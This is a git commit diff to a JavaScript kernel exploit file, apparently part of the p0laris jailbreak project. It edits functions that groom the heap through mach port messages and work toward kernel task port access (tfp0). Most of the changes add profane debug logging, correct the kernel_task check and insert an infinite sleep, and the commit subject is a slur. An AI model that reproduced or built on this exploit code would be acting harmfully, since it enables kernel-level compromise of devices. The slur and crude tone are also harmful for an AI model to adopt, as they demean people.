From b88cb06e11df31cb7f079d2c78c42b7fced7bb17 Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Sun, 31 Jul 2022 04:30:23 -0400
Subject: fucking retard

---
 src/stage4/kexp/exploit.js | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)

(limited to 'src/stage4/kexp')

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index aa10126..19d2623 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,13 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
 
 function release_port_ptrs(port) {
 //	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
+	p0laris_log("fuck");
 	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-//	p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+	p0laris_log("fuck");
+	//	p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
 	var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+	p0laris_log("fuck");
 	if (ret != KERN_SUCCESS) {
 		p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
+		p0laris_log("fuck2");
 	}
+	p0laris_log("fuck");
 	shit_heap_free(req);
+	p0laris_log("fuck");
 }
 
 function r3gister(task, init_port_set, real_count, fake_count) {
@@ -463,6 +469,9 @@ again: while (true) {
 	sched_yield();
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
+		if (i % 4 == 0) {
+			p0laris_log("release_port_ptrs %d\n", i);
+		}
 		release_port_ptrs(read_u32(fp + (i << 2)));
 	}
 
@@ -544,7 +553,7 @@ again: while (true) {
 	p0laris_log("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
 	p0laris_log("fuck\n");
 	call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
-	if (kernel_task_addr === 0xffffffff) {
+	if (read_u32(kernel_task_addr) === 0xffffffff) {
 		continue again;
 	}
 	p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
@@ -552,6 +561,10 @@ again: while (true) {
 
 	p0laris_log("get lucky\n");
 
+	while (true) {
+		sleep(3600);
+	}
+
 	return tfp0;
 	}
 }
-- 
cgit v1.2.3